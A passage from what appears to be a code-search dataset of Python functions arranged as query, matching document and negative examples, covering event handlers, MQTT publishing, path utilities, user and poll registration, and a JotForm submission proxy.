"def _DeviceListedEventHandler(self, event):\n self._HandleKeysLeft()\n if self.atft_manager.atfa_dev:\n atfa_message = str(self.atft_manager.atfa_dev)\n else:\n atfa_message = self.ALERT_NO_DEVICE\n\n if self.auto_prov and not self.atft_manager.atfa_dev:\n # If ATFA unplugged during auto mode,\n # exit the mode with an alert.\n self.toolbar.ToggleTool(self.ID_TOOL_PROVISION, False)\n self.OnToggleAutoProv(None)\n self._SendAlertEvent(self.ALERT_ATFA_UNPLUG)\n\n # If in auto provisioning mode, handle the newly added devices.\n if self.auto_prov:\n self._HandleAutoProv()\n\n self.PrintToWindow(self.atfa_devs_output, atfa_message)\n if self.last_target_list == self.atft_manager.target_devs:\n # Nothing changes, no need to refresh\n return\n\n # Update the stored target list. Need to make a deep copy instead of copying\n # the reference.\n self.last_target_list = self._CopyList(self.atft_manager.target_devs)\n self.target_devs_output.DeleteAllItems()\n for target_dev in self.atft_manager.target_devs:\n provision_status_string = ProvisionStatus.ToString(\n target_dev.provision_status, self.GetLanguageIndex())\n # This is a utf-8 string, need to transfer to unicode.\n provision_status_string = provision_status_string.decode('utf-8')\n self.target_devs_output.Append(\n (target_dev.serial_number, target_dev.location,\n provision_status_string))",
"def republish_done(self, dryrun=False):\n pass",
"def notify(self, l: 'SoNotList') -> \"void\":\n return _coin.SoAuditorList_notify(self, l)",
"def handle_poll_event(self, event):\n pass",
"def handle_list_alerts(self, message):\n if self.neon_in_request(message):\n user = self.get_utterance_user(message)\n user_alerts = self._get_alerts_for_user(user)\n if message.data.get(\"alarm\"):\n kind = 'alarm'\n elif message.data.get('timer'):\n kind = 'timer'\n elif message.data.get('reminder') or message.data.get('event'):\n kind = 'reminder'\n else:\n kind = 'alert'\n combined = user_alerts.get(\"alarm\", list())\n combined.extend(user_alerts.get(\"timer\"))\n combined.extend(user_alerts.get(\"reminder\"))\n combined.sort()\n user_alerts[kind] = combined\n alerts_list = user_alerts.get(kind)\n\n LOG.info(f\"alerts_list: {alerts_list}\")\n if not alerts_list:\n self.speak_dialog(\"NoUpcoming\", {\"kind\": kind}, private=True)\n\n else:\n # days, times, names, files, repeats = self.get_speak_time(alerts_list, single=False)\n self.speak_dialog(\"UpcomingType\", {'kind': kind}, private=True)\n for alert in alerts_list:\n data = self._get_speak_data_from_alert(alert)\n if data[\"repeat\"]:\n self.speak_dialog(\"ListRepeatingAlerts\", data, private=True)\n else:\n self.speak_dialog(\"ListAlerts\", data, private=True)",
"def notify(self, l: 'SoNotList') -> \"void\":\n return _coin.SoFieldContainer_notify(self, l)",
"def on_publish(self, unused_client, unused_userdata, unused_mid):\n self.print_debug('Published message acked.')",
"def notify(self, list: 'SoNotList') -> \"void\":\n return _coin.SoVRMLTimeSensor_notify(self, list)",
"def publish(nodeIdentifier, items, requestor):",
"def subscribe_to_objects(self):\n # define subscription interests\n interests = {\n \"epmMacEp\":{\"callback\": self.handle_epmMacEp}, \n \"epmIpEp\":{\"callback\": self.handle_epmIpEp},\n \"epmRsMacEpToIpEpAtt\":{\"callback\":self.handle_epmRsMacEpToIpEpAtt},\n \"fabricProtPol\":{\"callback\":self.handle_fabricProtPol},\n \"fabricExplicitGEp\":{\"callback\":self.handle_fabricExplicitGEp},\n \"vpcRsVpcConf\":{\"callback\":self.handle_vpcRsVpcConf},\n \"fabricNode\":{\"callback\": self.handle_fabricNode},\n \"fvCtx\": {\"callback\": self.handle_name_event},\n \"fvBD\": {\"callback\": self.handle_name_event},\n \"fvSvcBD\": {\"callback\": self.handle_name_event},\n \"fvEPg\": {\"callback\": self.handle_name_event},\n \"fvRsBd\": {\"callback\": self.handle_name_event},\n \"vnsRsEPpInfoToBD\": {\"callback\": self.handle_name_event},\n \"l3extExtEncapAllocator\": {\"callback\": self.handle_name_event},\n \"fvSubnet\": {\"callback\": self.handle_subnet_event},\n \"fvIpAttr\": {\"callback\": self.handle_subnet_event},\n }\n try:\n while 1:\n # start worker processes\n self.start_workers()\n \n # enqueue initial rebuild jobs created from stage_ep_history_db\n while len(self.rebuild_jobs)>0:\n self.enqueue_job(self.rebuild_jobs.pop(0))\n\n # override max_key_count if trust_subscription is disabled\n if not self.trust_subscription:\n self.max_key_count = 64\n\n # start subscriptions\n ept_utils.add_fabric_event(self.fabric, \"Running\", \"\")\n rc = ept_utils.subscribe(self.fabric, interests=interests, \n checker=check_apic_health, \n controller=self.control_subscription,\n controller_interval=self.controller_interval)\n # restart subscription if we see a stateful subscription close\n if rc == ept_utils.RC_SUBSCRIPTION_CLOSE:\n self.stop_workers(delay=0.1)\n logger.warn(\"received subscripton close, re-subscribe\")\n ept_utils.add_fabric_event(self.fabric, \"Re-initializing\",\n \"Restarting subscription\")\n continue\n elif rc == ept_utils.RC_SUBSCRIPTION_FAIL:\n logger.warn(\"received subscription fail\")\n ept_utils.add_fabric_event(self.fabric, \"Restarting\",\n \"APIC subscription failed\")\n else:\n logger.warn(\"unexpected subscription rc: %s\" % rc)\n break\n finally:\n # if subscriptions unexpectedly close, stop workers\n logger.debug(\"subscription unexpectedly ended\")\n self.stop_workers(delay=0.1)",
"def new_list(self):\r\n self.app.clear_data()\r\n self.populate_listbox(self.app.data)\r\n self.set_infobox_msg(\"New list created.\")",
"def on_publish(self, unused_client, unused_userdata, unused_mid):\n print('Published message - ACK received')",
"def publish():\n print(\"Publishing Thread\")\n client = start_client(PUBLISH_CLIENT_ID)\n while publishing:\n illuminance = read_light_sensor()\n temp, hum = read_temperature_humidity()\n readings = {\n 'pi1_timestamp': datetime.now().isoformat(),\n 'illuminance': read_light_sensor(),\n 'temperature': temp,\n 'humidity': hum,\n 'raspberry_pi': 1\n }\n client.publish(TOPIC, json.dumps(readings))\n print('Published readings: ', readings)\n client.loop(.1)\n time.sleep(10)\n print('Stop publishing.')",
"def handle_watch_stale(self, msg):\n key = \"%s,%s,%s,%s\" % (msg.fabric, msg.vnid, msg.addr, msg.node)\n uptime_delta = msg.wf.get_uptime_delta_offset(TRANSITORY_UPTIME)\n if msg.event[\"expected_remote\"] == 0:\n msg.xts = msg.now + TRANSITORY_STALE_NO_LOCAL + uptime_delta\n else:\n msg.xts = msg.now + TRANSITORY_STALE + uptime_delta\n with self.watch_stale_lock:\n self.watch_stale[key] = msg\n logger.debug(\"watch stale added with xts: %.03f, delta: %.03f\", msg.xts, msg.xts-msg.now)",
"def lists_callback(self, dent_type, data, account):\n if dent_type == \"home_avatar\":\n self.update_timeline_avatar(data)\n elif dent_type == \"end\":\n curtime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n self.time_updated_action.setText(\"<b>Last updated on: {0}</b>\".format(curtime))\n \n # Notifications\n if self._new_direct_messages > 0:\n notify = pynotify.Notification(\"QTDenter\", \"{0} new dents arrived.\".format(self._new_direct_messages), self.icon[\"path\"])\n notify.set_urgency(pynotify.URGENCY_NORMAL)\n notify.set_timeout(10000)\n notify.add_action(\"clicked\",\"Show QTDenter\", self.show_window, None)\n notify.show()\n self._new_direct_messages = 0\n else:\n self.add_to_timeline_iterator(data, account, dent_type)",
"def notify(self, nl: 'SoNotList') -> \"void\":\n return _coin.SoLOD_notify(self, nl)",
"def notify(self, l: 'SoNotList') -> \"void\":\n return _coin.SoDataSensor_notify(self, l)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Creates a relative path starting from the game_path.
|
def abs_path_to_game_path_rel(game_path, abs_path):
if not game_path or not abs_path:
return None
rel_path = None
i = abs_path.find(game_path)
if i != -1 and i == 0:
rel_path = abs_path[len(game_path):]
return rel_path
|
[
"def rel_to_abs(path):\r\n current_dir = os.path.abspath(os.path.dirname(__file__))\r\n return os.path.join(current_dir, path)",
"def makefullpath(path):\n try:\n os.makedirs(os.path.split(path)[0])\n except:\n pass",
"def get_full_path(relative_path, package=\"chemper\"):\n if os.path.exists(relative_path):\n return os.path.abspath(relative_path)\n return get_data_path(relative_path, package)",
"def _relative_path(path: Path, relative_to: Path) -> str:\n\n parents = 0\n\n while True:\n try:\n return \"\".join([\"../\"] * parents\n ) + str(path.relative_to(relative_to))\n except Exception:\n parents += 1\n relative_to = relative_to.parent",
"def add_path_to_project_root_str(path: str) -> Path:\n project_root = get_project_root()\n full_path = project_root / path\n return full_path",
"def makeFilePath(self, file_path):\n return '%s/%s' % (os.path.dirname(__file__), file_path)",
"def get_real_path(self):\n return os.path.join(self.root.path, self.path, self.filename)",
"def abs_slash(self):\n p = os.path.abspath(self)\n if not p.endswith('/'):\n return p + '/'\n return p",
"def to_absolute_path(path: str, from_library: Optional[bpy.types.Library] = None) -> str:\n return os.path.normpath(bpy.path.abspath(path, start=get_fp(), library=from_library))",
"def getAbsPath() -> str:\n thisFile:str = os.path.realpath(__file__)\n absPath:str = thisFile.replace(\"/srcTemplates.py\",\"\")\n return absPath",
"def _GetSrcRelativePath(path):\n assert path.startswith(_GetToolsParentDir())\n return expand_owners.SRC + path[len(_GetToolsParentDir()) + 1:]",
"def relativePath(self):\n path = os.getcwd()\n try:\n relative_path = build_root_relative_path(path)\n except BuildRootMissingException as bre:\n PRINT.info(\n f\"ERROR: BUILD_ROOT and current execution path ({path}) not consistent! {str(bre)}\"\n )\n sys.exit(-1)\n DEBUG.debug(\"Relative path: %s\", relative_path)\n return relative_path",
"def subject_relative_path(path):\n directory = path\n subject = component_name(path)\n\n filename = os.path.basename(path)\n directory = os.path.dirname(path)\n parent = os.path.basename(directory)\n\n if re.match(r\"index(?:[-._](?:spec|unit|test|acceptance))?\\.jsx?$\", filename):\n if re.match(r\"__tests?__/?\", parent):\n return '..' + os.sep\n return '.' + os.sep\n\n if re.match(r\"__tests?__/?\", parent):\n return '..' + os.sep\n\n return os.path.join('.', subject)",
"def get_project_path(project_name: str) -> Path:\n return Path(__file__).parent / (\"assets/%s/%s.flxproj\" % (project_name, project_name))",
"def path_on_server(self):\n\n # change dev_base if necessary\n if ConfigHandler.cfg.wb_new == \"True\":\n oPB.DEV_BASE = oPB.DEV_BASE_OPSI41\n else:\n oPB.DEV_BASE = oPB.DEV_BASE_OPSI40\n\n # if on Linux, we have to subtract local share base from development folder\n # -> the local share base acts like the drive letter on windows\n if platform.system() == 'Linux':\n tmp = self.projectfolder.replace(ConfigHandler.cfg.local_share_base, \"\")\n else:\n tmp = self.projectfolder\n\n if platform.system() == \"Windows\":\n # remove drive letter\n return oPB.DEV_BASE + tmp[2:].replace(\"\\\\\", \"/\")\n else:\n # replace possible double '/' with single '/'\n return (oPB.DEV_BASE + \"/\" + tmp).replace(\"//\", \"/\")\n\n \"\"\"\n if tmp.startswith(repo_base):\n return tmp\n else:\n if tmp.strip() != \"\":\n ret = (repo_base + \"/\" + tmp + \"/\" + self.id).replace(\"//\", \"/\")\n print(\"a\", ret)\n return ret\n else:\n ret = (repo_base + \"/\" + self.id).replace(\"//\", \"/\")\n print(\"b\", ret)\n return ret\n \"\"\"",
"def make_path(file_name):\n return os.path.abspath(os.path.join(output_directory,\n file_name))",
"def to_filesystem_path(self, wspath):\n if wspath.startswith('/'):\n project_name,*rest = wspath[1:].split('/', 1)\n project_loc = self.get_project_location(project_name)\n if not os.path.isdir(project_loc):\n raise RuntimeError(\"Directory for project {} doesn't exist (workspace dir not specified?): {}\".format(project_name, project_loc))\n return os.path.join(project_loc, *rest)\n else:\n return wspath # part is relative to current working directory",
"def relPath(self):\n return os.path.join(self.relLoc, self.fileName)",
"def _get_source_directory(self):\n base_dir = os.getcwd() + '/'\n logger.debug('Base dir: %s' % base_dir)\n logger.debug('Game parameter: %s' % self.game)\n if self.game == '':\n return base_dir\n\n base_dir += self.game\n logger.debug('Game directory: %s' % base_dir)\n if os.path.exists(base_dir) is False:\n logger.critical('Invalid game: %s' % self.game)\n sys.exit(128)\n\n return base_dir"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Register the User/Poll Pair. Register the User/Poll pair and assign them a UUID that can be used to identify them in subsequent requests.
|
async def register_poll(user_credentials: JotFormCredentials):
app_key, poll_id = user_credentials.appKey, user_credentials.pollID
if possible_uuid := redis.get(f"{app_key}-{poll_id}"):
return {"uuid": possible_uuid} # If the user is already registered
# Do not re-register them.
user_uuid = uuid4().hex # Otherwise, Generate a unique user ID.
# Save user credentials.
redis.set(user_uuid, f"{app_key}-{poll_id}")
# We also set the reverse as we want to reuse the UUIDs.
redis.set(f"{app_key}-{poll_id}", user_uuid)
return {"uuid": user_uuid}
|
[
"def register_user(self, user_info) -> Dict:\n raise NotImplementedError",
"def register(self, nickname, passwordHash):\n # Checks in the DB that the nickname was not already used. If ok, create\n # the player in the DB.\n if self.playersColl.find_one({'nickname': nickname}) == None:\n # creates the players in the DB\n playerID = self.playersColl.insert_one({'nickname': nickname, \n 'passwordHash': passwordHash, \n 'totalScore': 0, 'gameID': None}).inserted_id\n result = {'status': \"ok\", 'nickname': nickname, 'playerID': playerID }\n else:\n result = {'status': \"ko\", 'reason': \"invalid nickname\"}\n return result",
"def register(ctx, username, password):\n url = ctx.obj['URLS'].register_user()\n headers = ctx.obj['HEADERS']\n data = {\n 'username': username,\n 'password': password,\n 'verify': False\n }\n try:\n r = requests.post(url, json=data, headers=headers)\n r.raise_for_status()\n body = r.json()\n if ctx.obj['RAW']:\n click.echo(json.dumps(body, indent=4))\n else:\n user_id = body['id']\n user_name = body['username']\n click.echo('Registered {} with ID {}.'.format(user_name, user_id))\n except (requests.ConnectionError, requests.HTTPError) as ex:\n click.echo('{}'.format(ex))",
"def create_user(self):\n sid = \"#{}\".format(uuid.uuid4()) # the public facing session ID\n uid = \"#{}\".format(uuid.uuid4()) # the private user ID\n user = User(uid)\n\n self.users[uid] = user\n self.sid_to_uid[sid] = [uid, int(time.time())]\n return sid",
"def register(self) -> None:\n # Used for creating account. Submit to /create_account endpoint\n username = input(\"Enter your username. \" +\n \"This will be used to log in to the web service.\\n\")\n email = input(\"Enter your email. \" +\n \"This will be used as your GNUPG username.\\n\")\n password = getpass(\"Enter your password. \" +\n \"This will be used as your GNUPG passphrase.\\n\")\n headers = {\n \"accept\": \"application/json\",\n \"Content-Type\": \"application/json\"\n }\n payload = {\n \"username\": username,\n \"email\": email,\n \"password\": password\n }\n response = requests.post(f\"{self.BASE_URL}/register\", json=payload,\n headers=headers)\n\n self.gpg_service.create_key(passphrase=password, email=email)\n\n if response.status_code == 200:\n print(\"Account created.\\nAttempting to log in...\")\n self.login(username, password)\n\n else:\n print(\"There was a problem creating your account.\")",
"def register():\n\n data = collect_data()\n\n log.debug('data is: {0}'.format(json.dumps(data, default=lambda o: o.__dict__)))\n api_submit('/api/register', data, method='put')",
"def register():\n username = request.form['username']\n address = request.form['server_address']\n\n if not servers.exists(address=address):\n return bad_json_response('Server is not registered.')\n\n server_id = servers.export_one('id', address=address)\n\n if ping(address):\n if not users.exists(username=username):\n users.insert(username=username, server_id=server_id)\n else:\n return bad_json_response(\n 'Username is already taken. Try again :).')\n else:\n return bad_json_response(\n 'This data server is not available. '\n 'Please contact the server owner.'\n )\n\n return good_json_response('success')",
"def register_secret_key():\n require_parameters({'AWSAccessKeyId', 'AWSSecretKey'})\n found_user = USERS.get(get('AWSAccessKeyId'))\n if found_user is None:\n USERS.create(\n apikey=get('AWSAccessKeyId'),\n secretkey=get('AWSSecretKey')\n )\n return {\n 'template_name_or_list': 'secretkey.xml',\n 'response_type': 'RegisterSecretKeyResponse',\n 'AWSAccessKeyId': get('AWSAccessKeyId'),\n 'AWSSecretKey': get('AWSSecretKey'),\n 'Message': 'Successfully Registered!'\n }\n else:\n raise Ec2stackError(\n '400',\n 'DuplicateUser',\n 'The given AWSAccessKeyId is already registered'\n )",
"def signup():\n\n global active_user\n req = request.get_json(force=True, silent=True)\n username = req.get('username')\n password = req.get('password')\n # print(user, password)\n try:\n user = User.get(user_id=username)\n if not user:\n print('i was here')\n # create_user(userid = user, password = password)\n User(user_id=username, password=password)\n active_user = username\n return \"SUCESSS, Your ID is created\"\n else:\n return \"FALIURE, Your ID was already taken\"\n except Exception as e:\n return str(e)",
"def register(self, new_user: str, new_ip: str):\n\t\tself.__user[new_user] = new_ip\n\t\tself.__ip[new_ip] = new_user",
"def register(self, request, **kwargs):\n username, email = kwargs['username'], kwargs['email']\n new_user = User.objects.create_user(username, email)\n new_user.password = User.objects.set_unusable_password()\n new_user.save()\n\n new_twitter_profile = TwitterProfile(\n user=new_user,\n twitter_id=request.session.get('twitter_id', None),\n )\n new_twitter_profile.access_token = request.session.get('access_token', None) or new_twitter_profile.access_token\n new_twitter_profile.save()\n\n signals.user_registered.send(sender=self.__class__, user=new_user, request=request)\n return new_user",
"def add_user_pair(user1, user2):\n max_query = \"SELECT MAX(id) FROM UserPair\"\n user1_id = get_user_id(user1)\n user2_id = get_user_id(user2)\n\n query = \"\"\"\n INSERT OR IGNORE INTO UserPair\n (id, user1, user2) \n VALUES\n (?, ?, ?)\n \"\"\"\n\n db = get_db()\n cur = db.cursor()\n cur.execute(max_query)\n result = cur.fetchone()[0]\n if not result:\n new_id = 1\n else:\n new_id = int(result) + 1\n\n cur.execute(query, (new_id, user1_id, user2_id))\n #cur.execute(query, (new_id, user2_id, user1_id))\n\n db.commit()\n\n return new_id",
"def pair(self):\n device_public_key = self.get_value(\"DevicePublicKey\", no_session=True)\n if not device_public_key:\n raise MuxError(\"Unable to retrieve DevicePublicKey\")\n buid = self._usbmux.read_system_BUID()\n wifi_address = self.get_value(\"WiFiAddress\", no_session=True)\n\n try:\n from ._ssl import make_certs_and_key\n except ImportError:\n #print(\"DevicePair require pyOpenSSL and pyans1, install by the following command\")\n #print(\"\\tpip3 install pyOpenSSL pyasn1\", flush=True)\n raise RuntimeError(\"DevicePair required lib, fix with: pip3 install pyOpenSSL pyasn1\")\n\n cert_pem, priv_key_pem, dev_cert_pem = make_certs_and_key(device_public_key)\n pair_record = {\n 'DevicePublicKey': device_public_key,\n 'DeviceCertificate': dev_cert_pem,\n 'HostCertificate': cert_pem,\n 'HostID': str(uuid.uuid4()).upper(),\n 'RootCertificate': cert_pem,\n 'SystemBUID': buid,\n }\n\n with self.create_inner_connection() as s:\n ret = s.send_recv_packet({\n \"Request\": \"Pair\",\n \"PairRecord\": pair_record,\n \"Label\": PROGRAM_NAME,\n \"ProtocolVersion\": \"2\",\n \"PairingOptions\": {\n \"ExtendedPairingErrors\": True,\n }\n })\n assert ret, \"Pair request got empty response\"\n if \"Error\" in ret:\n # error could be \"PasswordProtected\" or \"PairingDialogResponsePending\"\n raise MuxError(\"pair:\", ret['Error'])\n\n assert 'EscrowBag' in ret, ret\n pair_record['HostPrivateKey'] = priv_key_pem\n pair_record['EscrowBag'] = ret['EscrowBag']\n pair_record['WiFiMACAddress'] = wifi_address\n \n self.usbmux.send_recv({\n \"MessageType\": \"SavePairRecord\",\n \"PairRecordID\": self.udid,\n \"PairRecordData\": bplist.dumps(pair_record),\n \"DeviceID\": self.devid,\n })\n return pair_record",
"async def register(websocket):\n USERS.add(websocket)\n logger.info('New client connected')\n await send_state_data()",
"def register_user(url, payload):\n resp = requests.post(url, data=payload)\n resp_obj = {\n 'resp_obj': resp,\n 'resp_data': resp.json()\n }\n return resp_obj",
"def register_pi():\n global video_village_pi_id\n result = requests.post(VILLAGE_REGISTER_ENDPOINT,\n headers=VILLAGE_REQUEST_HEADERS,\n json={'mac_address': PI_HARDWARE_ADDRESS})\n if result.status_code == 200:\n registration_info = result.json()\n video_village_pi_id = registration_info.get('id')\n return True\n\n return False",
"def _create_registration(self, user):\n salt = sha_constructor(str(random.random())).hexdigest()[:5]\n activation_key = sha_constructor(salt + user.username).hexdigest()\n return self.create(user=user,\n activation_key=activation_key)",
"def associate_auth(self, user, uid, response, details):\n extra_data = '' if not getattr(settings, 'SOCIAL_AUTH_EXTRA_DATA',\n False) \\\n else self.extra_data(user, uid, response, details)\n return UserSocialAuth.objects.create(user=user, uid=uid,\n provider=self.name,\n extra_data=extra_data)",
"def register(self):\n app = App.get_running_app()\n\n try:\n app.backend.register(self.ids.email.text, self.ids.password.text)\n Alert(title=\"Register Success\", text=\"Your account is successfully created.\")\n\n except BackEndError as e:\n Alert(title=\"Register Error\", text=e.error)\n except Exception as e:\n Alert(title=\"Register Error\", text=\"Unexpected error: \" + str(e))"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Proxy form submission requests Proxy the form submission requests to the JotForm API, return the responses verbatim. For more information on request and response formats,
|
async def proxy_submit_submission(uuid: str, submission: list[dict[str, Union[dict, list]]]):
credentials = redis.get(uuid)
if credentials is None:
raise HTTPError(401, "Unauthorised request")
app_key, poll_id = credentials.decode("utf-8").split("-") # Get back our credentials.
reply = put(f"https://api.jotform.com/form/" +
f"{poll_id}/submissions?apiKey={app_key}",
json=submission)
return Response(content=reply.content,
media_type=getattr(reply,"media_type", "application/json"))
|
[
"async def process_post(self, form: dict) -> str:\n\n logger = logging.getLogger(__name__)\n logger.debug('_BaseAgent.process_post: >>> form: {}'.format(form))\n\n validate_form(form, self.cfg.get('proxy-relay', False))\n\n if form['type'] == 'agent-nym-lookup':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n rv = await self.get_nym(form['data']['agent-nym']['did'])\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] == 'agent-endpoint-lookup':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n rv = await self.get_endpoint(form['data']['agent-endpoint']['did'])\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] == 'agent-endpoint-send':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n resp_json = await self.send_endpoint()\n rv = json.dumps({})\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] == 'schema-lookup':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n s_key = schema_key_for(form['data']['schema'])\n schema_json = await self.get_schema(s_key)\n schema = json.loads(schema_json)\n if not schema:\n rv = schema_json\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n rv = schema_json\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] in (\n 'agent-nym-send',\n 'schema-send',\n 'claim-def-send',\n 'claim-offer-create',\n 'claim-offer-store',\n 'claim-create',\n 'claim-store',\n 'claim-request',\n 'proof-request',\n 'proof-request-by-referent',\n 'verification-request'): # do not proxy: master-secret-set, claims-reset\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n # base listening agent doesn't do this work\n logger.debug('_BaseAgent.process_post: <!< not this form type: {}'.format(form['type']))\n raise TokenType('{} does not respond to token type {}'.format(self.__class__.__name__, form['type']))\n\n logger.debug('_BaseAgent.process_post: <!< not this form type: {}'.format(form['type']))\n raise TokenType('{} does not support token type {}'.format(self.__class__.__name__, form['type']))",
"def submit_apbs_json():\n\n json_response = None\n http_status_response = None\n\n if request.method == 'POST':\n form = loads(request.data)['form']\n for key in form.keys():\n if key == 'output_scalar':\n for option in form[key]:\n form[option] = option\n form.pop('output_scalar')\n else:\n form[key] = str(form[key])\n # form[key] = unicode(form[key])\n # print('\\n\\n')\n print(pp.pformat(form, indent=4, width=10))\n # print('\\n\\n')\n \n # print(pp.pformat(request.form.to_dict(), indent=4, width=10))\n\n # redirectURL = apbs_cgi.mainInput(request.form)\n # redirectURL = apbs_cgi.mainInput(loads(request.data))\n redirectURL = apbs_cgi.mainInput(form, STORAGE_HOST)\n\n '''=== DEBUG LINE FOR DEV: REMOVE IN FINAL ==='''\n # if 'http://localhost:5000' in redirectURL:\n # print(redirectURL)\n # redirectURL = redirectURL.replace('http://localhost:5000', 'http://localhost:3000')\n # print(redirectURL)\n '''==========================================='''\n\n # return redirect(redirectURL)\n response = make_response(JSONEncoder().encode({'status': 'success'}))\n http_status_code = 202\n\n elif request.method == 'OPTIONS':\n response = make_response(JSONEncoder().encode(json_response))\n response = jobutils.get_request_options(response, 'POST')\n response.headers['Access-Control-Allow-Headers'] = 'x-requested-with,content-type'\n http_status_code = 204\n\n response.headers['Content-Type'] = 'application/json'\n if request.referrer:\n # Add origin header to response if origin is in whitelist\n request_origin_url = request.referrer.split('?')[0]\n if request_origin_url in ORIGIN_WHITELIST:\n cleared_domain = request_origin_url[:request_origin_url.index('/apbs')]\n response.headers['Access-Control-Allow-Origin'] = cleared_domain\n\n return response, http_status_code",
"async def _response_from_proxy(self, form: dict) -> 'Response':\n\n logger = logging.getLogger(__name__)\n logger.debug('_BaseAgent._response_from_proxy: >>> form: {}'.format(form))\n\n rv = None\n if (self.cfg.get('proxy-relay', False)) and ('proxy-did' in form['data']):\n proxy_did = form['data'].pop('proxy-did')\n if (proxy_did != self.did):\n endpoint = json.loads(await self.get_endpoint(proxy_did))\n if (('endpoint' not in endpoint) or\n not re.match(\n CONFIG_JSON_SCHEMA['agent']['properties']['endpoint']['pattern'],\n endpoint['endpoint'],\n re.IGNORECASE)):\n logger.debug('_BaseAgent._response_from_proxy: <!< no agent found for DID {}'.format(proxy_did))\n raise ProxyHop('No agent on the ledger has DID {}'.format(proxy_did))\n if re.match('^http[s]?://.*', endpoint['endpoint'], re.IGNORECASE):\n r = post(\n '{}/{}'.format(endpoint['endpoint'], form['type']),\n json=form) # requests module json-encodes\n if not r.ok:\n logger.debug('_BaseAgent._response_from_proxy: <!< proxy got HTTP {}'.format(r.status_code))\n raise HTTPError(r.status_code, r.reason)\n else:\n logger.debug('_BaseAgent._response_from_proxy: <!< cannot resolve proxy hop')\n raise ProxyHop(\n 'No proxy strategy implemented for target agent endpoint {}'.format(endpoint['endpoint']))\n rv = json.dumps(r.json()) # requests module json-decodes\n\n logger.debug('_BaseAgent._response_from_proxy: <<< {}'.format(rv))\n return rv",
"def _submit_form(self, input_data=None, cache=True):\n if input_data is None:\n input_data = {}\n # only overwrite payload's values if the ``input_data`` value is not None\n # to avoid overwriting of the form's default values\n payload = self._default_form_values().copy()\n for k, v in input_data.items():\n if v is not None:\n payload[k] = v\n url = self._form_action_url\n log.debug(f\"final payload = {payload} from url={url}\")\n response = self._request(\"POST\", url=url, data=payload,\n timeout=self.TIMEOUT, cache=cache)\n response.raise_for_status()\n log.debug(\"Retrieved data from POST request\")\n return response",
"def post_form_data_request():\n url = \"http://httpbin.org/post\"\n payload = {'key1': 'value1', 'key2': 'value2'}\n r = requests.post(url, data=payload)\n print(r.text) # see how data goes into 'form'\n\n \"\"\"\n {\n \"args\": {},\n \"data\": \"\",\n \"files\": {},\n \"form\": {\n \"key1\": \"value1\",\n \"key2\": \"value2\"\n },\n \"headers\": {\n \"Accept\": \"*/*\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Length\": \"23\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Host\": \"httpbin.org\",\n \"User-Agent\": \"python-requests/2.5.3 CPython/2.7.9 Darwin/14.1.0\"\n },\n \"json\": null,\n \"origin\": \"74.71.230.126\",\n \"url\": \"http://httpbin.org/post\"\n }\n \"\"\"\n\n # If you want to send data that is not form-encoded, pass in a string\n payload = 'This is a test'\n r = requests.post(url, data=payload)\n print(r.text) # see how it goes to 'data' instead of 'form'\n\n \"\"\"\n {\n \"args\": {},\n \"data\": \"This is a test\",\n \"files\": {},\n \"form\": {},\n \"headers\": {\n \"Accept\": \"*/*\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Length\": \"14\",\n \"Host\": \"httpbin.org\",\n \"User-Agent\": \"python-requests/2.5.3 CPython/2.7.9 Darwin/14.1.0\"\n },\n \"json\": null,\n \"origin\": \"74.71.230.126\",\n \"url\": \"http://httpbin.org/post\"\n }\n \"\"\"",
"def submit_pdb2pqr_json():\n if request.method == 'POST':\n # form_json\n # print(pp.pformat(request.form.to_dict(), indent=4, width=10))\n\n # pp.pprint(request.form.to_dict())\n # print(type(request.form))\n # print(type(request.form.to_dict()))\n\n # redirectURL = main_cgi.mainCGI(request.form, request.files, STORAGE_HOST)\n runner = pdb2pqr_runner.Runner(request.form, request.files, STORAGE_HOST)\n redirectURL = runner.handle_pdb2pqr(STORAGE_HOST)\n # import legacy\n # from legacy.main_cgi import mainCGI\n # redirectURL = mainCGI(request.form, request.files, STORAGE_HOST)\n\n '''=== DEBUG LINE FOR DEV: REMOVE IN FINAL ==='''\n if 'http://localhost:5000' in redirectURL:\n print(redirectURL)\n redirectURL = redirectURL.replace('http://localhost:5000', 'http://localhost:3000')\n print(redirectURL)\n '''==========================================='''\n\n return redirect(redirectURL)",
